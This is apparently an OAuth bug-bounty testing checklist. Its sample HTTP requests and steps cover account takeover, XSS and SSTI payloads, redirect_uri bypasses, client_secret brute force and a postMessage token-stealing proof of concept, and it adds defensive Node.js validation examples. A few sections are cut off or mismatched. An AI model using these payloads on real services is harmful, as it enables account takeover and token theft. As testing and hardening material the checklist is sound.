GET /oauth/Connect?response_type=code&client_id=ID&scope=openid%20email&redirect_uri=https://company.com&nonce=Random&hd=gmail.com HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Referer: https://previous.com/path
Origin: https://www.company.com
Accept-Encoding: gzip, deflate
Remove email from scope
Try removing the email from the scope parameter while signing up or signing in with the service provider to get an account takeover.
Use Access Token Of Your App Instead Of Auth Token Of Victim App
1- Create a Facebook app
2- Generate an access token
3- Go to the victim app and click the Facebook sign-in button while intercepting the traffic with Burp Suite
4- Change the value of the auth_token parameter to your access token
5- Forward the request; you will be logged in, since there is no validation of whether the access token was generated for the victim app or for another app
GET /oauth/Connect HTTP/1.1
Host: me.com/www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Origin: https://www.company.com
Insert Your Domain In Referer Header While
GET /oauth/Connect HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://me.com/path
Origin: https://www.company.com
In the OAuth connect request, try inserting admin@company.com as the value of the email in the scope parameter to gain extra privileges or access more functionality.
POST /oauth/Connect HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: Number

firstname=I&lastname=am&image=URL&anti_csrf=CSRF&email=admin@company.com&access_token=******
IDOR in id= Parameter
In the OAuth connect request, try to find an id in the scope, then change that id to the id of the logged-in account to take over that account.
POST /oauth/Connect HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: Number

firstname=I&lastname=am&image=URL&anti_csrf=CSRF&id=Id-Of-Another-Account&access_token=******
Add JSON OR XML Extension To OAuth Endpoint
In the OAuth connect request, try adding a JSON or XML extension to the OAuth endpoint, e.g. oauth/connect.json; the token may be exposed in the response.
POST /oauth/Connect.json HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: Number

type=token&client_id=ID&anti-csrf=&redirect_uri=URL
XSS in OAUTH Connect/Callback
GET /oauth/Connect?)%7D(alert)(location);%7B%3C!--&state=\&redirect_uri=URL&scope=read&type=code&client_id=ID& HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Referer: https://previous.com/path
Origin: https://www.company.com
Accept-Encoding: gzip, deflate
Insert XSS Payloads To Cause Errors
Try inserting XSS payloads to cause errors.
GET /oauth/Connect?client_id=<marquee loop=1 width=0 onfinish= pr\u006fmpt(document.domain)></marquee> HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Referer: https://me.com/path
Origin: https://www.company.com
SSTI in Scope Parameter
In the OAuth connect request, try inserting SSTI payloads in the scope parameter, e.g. ${T(java.lang.Runtime).getRuntime().exec("calc.exe")}, to get RCE.
GET /oauth/Connect?type=code&client_id=ID&state=Random&redirect_uri=URL&scope=${T(Java.lang.Runtime).getRuntime().exec("calc.exe")} HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Referer: https://previous.com/path
Origin: https://www.company.com
Accept-Encoding: gzip, deflate
XSS in RedirectUri
Try inserting XSS payloads as the value of the redirect URL, e.g. data:company.com;text/html;charset=UTF-8,%3Chtml%3E%3Cscript%3Edocument.write(document.domain);%3C%2Fscript%3E%3Ciframe/src= xxxxx%3Eaaaa%3C/iframe%3E%3C%2Fhtml%3E, to get DOM-based XSS.
GET /oauth/Connect?type=code&client_id=ID&state=Random&redirect_uri=data:company.com;text/html;charset=UTF-8,%3Chtml%3E%3Cscript%3Edocument.write(document.domain);%3C%2Fscript%3E%3Ciframe/src=xxxxx%3Eaaaa%3C/iframe%3E%3C%2Fhtml%3E&scope=read HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
-----------------------------
POST /oauth/Connect HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: Number

client_id=ID&client_secret=SECRET&type=Authorization&code=Auth_code&redirect_uri=javascript:fetch('XSS')
Path Traversal to open Redirect
Try inserting a redirect URL parameter into the value of the redirect URL to steal the authorization code or the access token.
GET /oauth/Connect?type=code&client_id=ID&state=Random&redirect_uri=https://www.company.com.com/../../redirect_uri=https://me.com&scope=read HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Referer: https://previous.com/path
Origin: https://www.company.com
Authentication Bypass via OAuth Implicit Flow
1- Study the OAuth flow starting from the authorization request GET /auth?client_id=[...].
2- The client receives user info from the OAuth service.
3- The client logs in by sending a POST request to its /authenticate endpoint with the user info and the access token.
4- In Burp Repeater, modify the email in the POST request to impersonate another user.
5- Right-click the POST request, select "Request in browser" > "In original session", visit the URL, and log in as another user.
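The common root cause behind the token-from-another-app step, the admin@company.com / id= tricks in the connect request and the /authenticate impersonation above is a server that believes identity fields the client sends alongside the token. The following is an added example, not code from the original checklist: a Node.js /authenticate step that ignores any client-supplied email or id, takes the identity from the provider's token introspection, and rejects tokens whose audience is not this app's own client_id. The client id, the token table and the account table are constructed sample data standing in for a real provider call and a real user store.

```javascript
// Added example (not from the original checklist): a server-side /authenticate
// step that never trusts identity fields sent by the client. Identity comes from
// the provider's token introspection, and the token must have been issued to
// OUR client_id, so a token minted for some other app is rejected.
const OUR_CLIENT_ID = 'our-app-client-id'; // assumed value

// Constructed stand-in for the provider's token-info endpoint. A real server
// would call the provider over HTTPS; this table is sample data only.
const PROVIDER_TOKEN_INFO = {
  'tok-for-our-app':   { active: true,  aud: 'our-app-client-id',  sub: '1001', email: 'alice@example.com' },
  'tok-for-other-app': { active: true,  aud: 'attacker-client-id', sub: '1001', email: 'alice@example.com' },
  'tok-no-email':      { active: true,  aud: 'our-app-client-id',  sub: '1003' },
  'tok-expired':       { active: false, aud: 'our-app-client-id',  sub: '1002', email: 'bob@example.com' },
};
function introspect(token) {
  return PROVIDER_TOKEN_INFO[token] || { active: false };
}

// Local accounts keyed by the provider's stable subject id, never by an email
// taken from the request body. Constructed sample data.
const ACCOUNTS_BY_SUB = {
  '1001': { id: 42, email: 'alice@example.com', role: 'user' },
};

// body is the parsed POST /authenticate form. Any email/id fields the client
// sent are ignored on purpose: they are attacker-controlled.
function authenticate(body) {
  if (typeof body.access_token !== 'string') return { ok: false, reason: 'missing_token' };
  const info = introspect(body.access_token);
  if (!info.active) return { ok: false, reason: 'inactive_token' };
  // Token was generated for a different app: refuse it even though it is valid.
  if (info.aud !== OUR_CLIENT_ID) return { ok: false, reason: 'token_not_for_this_client' };
  // The email scope was not granted: refuse rather than fall back to whatever
  // the client typed into the form.
  if (!info.email) return { ok: false, reason: 'email_not_granted' };
  const account = ACCOUNTS_BY_SUB[info.sub];
  if (!account) return { ok: false, reason: 'no_linked_account' };
  return { ok: true, accountId: account.id, email: account.email, role: account.role };
}
```

A client posting email=admin@company.com or id=Id-Of-Another-Account together with a valid token still lands in the account the provider says the token belongs to, and a token issued to another client_id is refused before any lookup happens.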
Forced OAuth Profile Linking
1- Sign in with a social media profile.
2- Capture the request that includes redirect_uri in /auth?client_id[...].
3- Check if the state parameter is present. If not, it’s vulnerable to CSRF.
4- Copy the request URL from Burp, drop the request, and turn off intercept.
5- Log out, send the link to the victim, or use an iframe on your website.
6- The victim's browser completes the OAuth flow, linking your profile to their account.
CSRF
- Integration linking
- No state parameter, or
- State parameter with a static value
- Remove the static parameter
Insufficient Redirect URI Validation
Exploits:
Open Redirect: Redirect sensitive data to an attacker-controlled server.
Attacker can steal the code and state parameter using this code
POST-AUTH REDIRECT + LOGIN CSRF
There is an endpoint vulnerable to open redirect; use it to bypass the redirect_uri restrictions, and use &response_mode=fragment to send the code in the URL fragment.
The website is vulnerable to an open redirect. After a user logs in, we can exploit the state parameter to perform a CSRF attack, causing the user to log into our account after completing the OAuth process. However, to steal the user's session/code when they log into the attacker-owned account, we can use &response_mode=fragment. This will send the user's code to an attacker-controlled site in the URL after the # sign, along with the attacker's code in the query.
Disclosure of Secrets
Leaking client_secret allows attackers to generate access tokens and access user data.
Client Secret Brute Force
Brute force the client_secret to steal accounts.
POST /token HTTP/1.1
content-type: application/x-www-form-urlencoded
host: target-server
content-length: 135
Connection: close
code=authorization_code&redirect_uri=callback_url&grant_type=authorization_code&client_id=client_id&client_secret=[bruteforce]
Referer Header Leaking Code + State
Verify whether the code and state are reflected in the Referer header when the user navigates to another page.
Access Token Stored in Browser History
Ensure access tokens are not stored in browser history.
Everlasting Authorization Code
Authorization code should have a short lifespan to limit the attack window.
Verify for potential race conditions that can lead to security issues.
Summary
OAuth implementations can be vulnerable to various security issues. By understanding these vulnerabilities and following the steps outlined, you can effectively test and secure OAuth flows.
Use IDN Homograph Attack To Spoof Redirect URL Parameter
Try using an IDN homograph attack to spoof the redirect URL parameter in order to steal the authorization code or the access token.
GET /oauth/Connect?type=code&client_id=ID&state=Random&redirect_uri=https://www.cṍmpany.com&scope=read HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Referer: https://previous.com/path
Origin: https://www.company.com
Try inserting the invisible range %00 to %FF in the URL, e.g. me.com%5bcompany.com, as the value of the redirect URL parameter.
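The redirect_uri findings on this page (data: and javascript: schemes, the /../ path traversal, the "Insufficient Redirect URI Validation" section, the IDN homograph host and the %5b byte in the host) are all defeated by one rule on the authorization server: parse the value, then require an exact match against a registered URI. The following is an added example, not code from the original checklist, of that check in Node.js using the WHATWG URL parser; the registered URI list is an assumed value.

```javascript
// Added example (not from the original checklist): exact-match redirect_uri
// validation. Registration is exact: scheme, host, port and path, with no
// query string and no fragment.
const REGISTERED_REDIRECT_URIS = new Set([
  'https://www.company.com/oauth/callback', // assumed registered value
]);

function isAllowedRedirectUri(raw) {
  if (typeof raw !== 'string' || raw.length > 2048) return false;
  let url;
  try {
    // The parser lowercases the host, drops a default port, converts a Unicode
    // host to punycode and resolves "/../" segments, so the comparison below
    // runs on the canonical form, not on the attacker's spelling.
    url = new URL(raw);
  } catch {
    // e.g. me.com%5bcompany.com: '[' is a forbidden host code point, so the
    // parser refuses the value instead of guessing a host.
    return false;
  }
  if (url.protocol !== 'https:') return false;     // rejects data:, javascript:, http:
  if (url.username || url.password) return false;  // https://www.company.com@me.com/ style
  if (url.search || url.hash) return false;        // no caller-controlled query or fragment
  // Registered hosts are plain ASCII, so any xn-- label means a homograph host
  // (www.cṍmpany.com arrives here as www.xn--...). Anything else odd in the host
  // fails the character whitelist.
  if (!/^[a-z0-9.-]+$/.test(url.hostname)) return false;
  if (url.hostname.split('.').some((label) => label.startsWith('xn--'))) return false;
  const canonical = `${url.protocol}//${url.host}${url.pathname}`;
  return REGISTERED_REDIRECT_URIS.has(canonical);
}
```

Prefix or substring matching ("starts with https://www.company.com") is what lets www.company.com.com, path traversal and open-redirect chaining through; exact matching on the parsed form has no such edge.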
Change Request Method
Try changing the request method, e.g. to GET, POST, HEAD or PUT, to understand how the company routes the different methods in the OAuth flow.
HEAD /oauth/Connect?type=code&client_id=ID&state=Random&redirect_uri=URL&scope=read HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Referer: https://previous.com/path
Origin: https://www.company.com
Accept-Encoding: gzip, deflate
Race Condition
Try to figure out how the server reacts to a race condition by using Turbo Intruder or Nuclei to send simultaneous requests.
GET /oauth/Callback?code=Valid HTTP/1.1
Host: www.company.com
X-Test: %s

email=victim@gmail.com&otp=wrongOTP
XSS in the code= parameter
Try inserting XSS payloads, e.g. ,%2520alert(123))%253B//, in the authorization code parameter if the value of the code parameter is reflected.
GET /oauth/Callback?code=,%2520alert(123))%253B// HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Referer: https://previous.com/path
Origin: https://www.company.com
Reuse The Authorization Code With XSS Payloads
If the authorization code can be used more than once, try reusing the authorization code with XSS payloads, e.g. Code<script>alert('XSS')</script>.
POST /oauth/Callback HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

client_id=ID&client_secret=SECRET&type=Authorization&code=Auth_Code<script>alert('XSS')</script>&redirect_uri=URL
Use The OAuth Token With Logged In User In OAuth Provider
If the app asks you to log in with the OAuth provider by generating an OAuth token, try using that OAuth token while a different user is logged in to the OAuth provider.
1 - I am logged in to app.com as Account One
2 - I open appservice.com
3 - I get https://api.app.com/oauth/?oauth_token=*****
4 - I do not move forward and share this link with someone who is logged in to app.com as Account Two
5 - Account Two grants the permission to the third-party app appservice.com
6 - Account One also grants the permission to the third-party app appservice.com by using the same OAuth token
7 - I get the appservice.com dashboard of Account Two, not Account One
Exploit Post Messages
Try using a whitelisted subdomain that has an endpoint containing postMessage(Msg,"*"); where Msg = window.location.href.split("#")[1]; to steal the access token.
1 - Search for:
var Msg = window.location.href.split("#")[1];
window.parent.postMessage(Msg,"*");
2 - There is no X-Frame-Options header
3 - Use this PoC:
var exploit_url = 'https://company.com/oauth?client_id=id&redirect_uri=https://sub.company.com/postMsg.js';
var i = document.createElement('iframe');
document.body.appendChild(i);
window.addEventListener('oauth', function(Token) {alert(Token.data.name);}, !1);
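The relay above leaks because of two things the checklist points at: the callback page posts the fragment to whoever embedded it (targetOrigin "*"), and nothing stops a third party from embedding it. The following is an added example, not code from the original checklist or from any real callback page, of the hardened pattern: the callback page names the one origin allowed to receive the fragment and is served with anti-framing headers (so it runs as a popup with window.opener rather than in an iframe), and the receiving page checks event.origin and the message shape before using anything. APP_ORIGIN, the callback origin and the message format are assumed values; the window objects in the test are fakes so the functions can run outside a browser.

```javascript
// Added example (not from the original checklist): postMessage relay of the
// OAuth fragment restricted to one known origin on both ends.
const APP_ORIGIN = 'https://www.company.com'; // assumed: the only page allowed to receive tokens

// Callback page side (runs in the popup). Sends the fragment only to
// targetOrigin; the browser drops the message if the opener is any other
// origin, which is what "*" gave away.
function relayFragment(href, openerWindow, targetOrigin = APP_ORIGIN) {
  const fragment = href.split('#')[1];
  if (!fragment || !openerWindow) return false;
  openerWindow.postMessage(fragment, targetOrigin);
  return true;
}

// App page side. Builds a "message" listener that ignores anything not sent
// by the expected callback origin or not shaped like the fragment we expect.
function makeTokenMessageHandler(expectedOrigin, onToken) {
  return function onMessage(event) {
    if (event.origin !== expectedOrigin) return false;
    if (typeof event.data !== 'string' || !/^access_token=/.test(event.data)) return false;
    onToken(new URLSearchParams(event.data).get('access_token'));
    return true;
  };
}

// Headers the callback page should be served with so no third-party page can
// frame it (step 2 above looks for exactly this being absent). With these set
// the relay must use a popup (window.opener), not an iframe.
const CALLBACK_RESPONSE_HEADERS = {
  'X-Frame-Options': 'DENY',
  'Content-Security-Policy': "frame-ancestors 'none'",
};
```

In a browser the app page registers the handler with window.addEventListener('message', makeTokenMessageHandler('https://sub.company.com', saveToken)); the event name is "message", and the origin check is what makes an attacker-hosted page unable to inject or receive the token.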